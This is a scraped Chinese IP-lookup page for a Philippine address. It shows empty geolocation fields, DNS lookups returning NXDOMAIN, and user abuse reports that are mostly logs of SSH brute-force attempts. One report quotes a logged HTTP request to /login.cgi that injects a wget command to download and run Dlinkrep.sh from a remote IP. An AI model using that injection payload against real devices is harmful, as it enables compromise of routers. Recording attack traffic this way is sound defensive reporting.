必须是合法有效的IP地址, 可以是IPv4或者是IPv6, 例如127.0.0.1或者2001:DB8:0:0:8:800:200C:417A
基本信息:

城市(city): unknown

省份(region): unknown

国家(country): Philippines

运营商(isp): unknown

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): unknown

用户上报:
暂无关于此IP的讨论, 沙发请点上方按钮
相同子网IP讨论:
暂无关于此IP所属子网相关IP的讨论.
WHOIS信息:
b
DIG信息:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 123.108.119.139
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 29033
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;123.108.119.139.		IN	A

;; AUTHORITY SECTION:
.			30	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2025043000 1800 900 604800 86400

;; Query time: 194 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Wed Apr 30 20:33:54 CST 2025
;; MSG SIZE  rcvd: 108
HOST信息:
Host 139.119.108.123.in-addr.arpa. not found: 3(NXDOMAIN)
NSLOOKUP信息:
Server:		183.60.83.19
Address:	183.60.83.19#53

** server can't find 139.119.108.123.in-addr.arpa: NXDOMAIN
相关IP信息:
最新评论:
IP 类型 评论内容 时间
78.128.113.166 attack
20 attempts against mh_ha-misbehave-ban on oak.magehost.pro
2019-12-29 14:11:50
46.101.164.47 attack
Dec 29 06:21:06 srv-ubuntu-dev3 sshd[103695]: Invalid user webadmin from 46.101.164.47
Dec 29 06:21:06 srv-ubuntu-dev3 sshd[103695]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=46.101.164.47
Dec 29 06:21:06 srv-ubuntu-dev3 sshd[103695]: Invalid user webadmin from 46.101.164.47
Dec 29 06:21:08 srv-ubuntu-dev3 sshd[103695]: Failed password for invalid user webadmin from 46.101.164.47 port 39134 ssh2
Dec 29 06:23:18 srv-ubuntu-dev3 sshd[103843]: Invalid user operator from 46.101.164.47
Dec 29 06:23:18 srv-ubuntu-dev3 sshd[103843]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=46.101.164.47
Dec 29 06:23:18 srv-ubuntu-dev3 sshd[103843]: Invalid user operator from 46.101.164.47
Dec 29 06:23:20 srv-ubuntu-dev3 sshd[103843]: Failed password for invalid user operator from 46.101.164.47 port 50498 ssh2
Dec 29 06:25:28 srv-ubuntu-dev3 sshd[105460]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid
...
2019-12-29 13:53:53
221.9.51.118 attack
SS5,DEF GET /login.cgi?cli=aa%20aa%27;wget%20http://176.123.4.234/Dlinkrep.sh%20-O%20-%3E%20/tmp/kh;Dlinkrep.sh%20/tmp/kh%27$
2019-12-29 14:10:54
139.59.26.81 attackbotsspam
RDP Brute-Force (Grieskirchen RZ1)
2019-12-29 13:55:34
190.181.60.2 attack
2019-12-29T06:03:38.210682shield sshd\[5929\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=static-190-181-60-2.acelerate.net  user=root
2019-12-29T06:03:39.778791shield sshd\[5929\]: Failed password for root from 190.181.60.2 port 51812 ssh2
2019-12-29T06:06:35.588779shield sshd\[6574\]: Invalid user douggie from 190.181.60.2 port 51242
2019-12-29T06:06:35.593276shield sshd\[6574\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=static-190-181-60-2.acelerate.net
2019-12-29T06:06:37.800951shield sshd\[6574\]: Failed password for invalid user douggie from 190.181.60.2 port 51242 ssh2
2019-12-29 14:07:01
110.177.72.152 attackbotsspam
Fail2Ban Ban Triggered
2019-12-29 13:56:57
101.71.2.137 attackspam
Dec 29 05:29:57 v22018086721571380 sshd[19890]: Failed password for invalid user jj9090 from 101.71.2.137 port 44578 ssh2
Dec 29 05:54:59 v22018086721571380 sshd[21381]: Failed password for invalid user haha from 101.71.2.137 port 60198 ssh2
2019-12-29 13:56:28
103.129.97.56 attackbotsspam
Wordpress login scanning
2019-12-29 13:51:48
91.201.4.122 attack
Dec 29 05:51:07 lnxweb61 sshd[22233]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=91.201.4.122
Dec 29 05:51:09 lnxweb61 sshd[22233]: Failed password for invalid user allsop from 91.201.4.122 port 50000 ssh2
Dec 29 05:54:30 lnxweb61 sshd[24633]: Failed password for root from 91.201.4.122 port 45596 ssh2
2019-12-29 14:17:58
124.88.113.255 attackspam
Fail2Ban Ban Triggered
2019-12-29 14:00:23
222.82.62.175 attackbots
Fail2Ban Ban Triggered
2019-12-29 14:05:44
45.80.65.1 attackspambots
"SSH brute force auth login attempt."
2019-12-29 13:54:37
222.186.180.17 attackbotsspam
Dec 29 06:55:38 markkoudstaal sshd[22473]: Failed password for root from 222.186.180.17 port 29224 ssh2
Dec 29 06:55:41 markkoudstaal sshd[22473]: Failed password for root from 222.186.180.17 port 29224 ssh2
Dec 29 06:55:51 markkoudstaal sshd[22473]: error: maximum authentication attempts exceeded for root from 222.186.180.17 port 29224 ssh2 [preauth]
2019-12-29 14:15:36
158.101.0.216 attackspambots
Dec 25 19:20:29 sanyalnet-cloud-vps4 sshd[19856]: Connection from 158.101.0.216 port 23203 on 64.137.160.124 port 22
Dec 25 19:20:29 sanyalnet-cloud-vps4 sshd[19856]: Did not receive identification string from 158.101.0.216
Dec 25 19:21:57 sanyalnet-cloud-vps4 sshd[19869]: Connection from 158.101.0.216 port 29627 on 64.137.160.124 port 22
Dec 25 19:21:57 sanyalnet-cloud-vps4 sshd[19869]: Invalid user kiuchi from 158.101.0.216
Dec 25 19:21:57 sanyalnet-cloud-vps4 sshd[19869]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=158.101.0.216 
Dec 25 19:21:59 sanyalnet-cloud-vps4 sshd[19869]: Failed password for invalid user kiuchi from 158.101.0.216 port 29627 ssh2
Dec 25 19:21:59 sanyalnet-cloud-vps4 sshd[19869]: Received disconnect from 158.101.0.216: 11: Bye Bye [preauth]
Dec 25 19:22:49 sanyalnet-cloud-vps4 sshd[19919]: Connection from 158.101.0.216 port 34214 on 64.137.160.124 port 22
Dec 25 19:22:49 sanyalnet-cloud-vps4 sshd[19919........
-------------------------------
2019-12-29 14:26:47
216.244.66.237 attackspam
22 attempts against mh-misbehave-ban on tree.magehost.pro
2019-12-29 14:14:20

最近上报的IP列表

229.230.89.250 123.108.119.210 34.253.7.93 192.168.18.90
192.168.18.60 201.208.96.244 10.12.100.100 34.146.223.138
201.70.155.101 170.209.242.43 54.197.23.186 80.167.192.163
188.89.66.136 46.19.69.70 43.130.40.120 104.28.249.42
64.112.42.108 115.45.42.208 192.168.1.184 192.168.31.209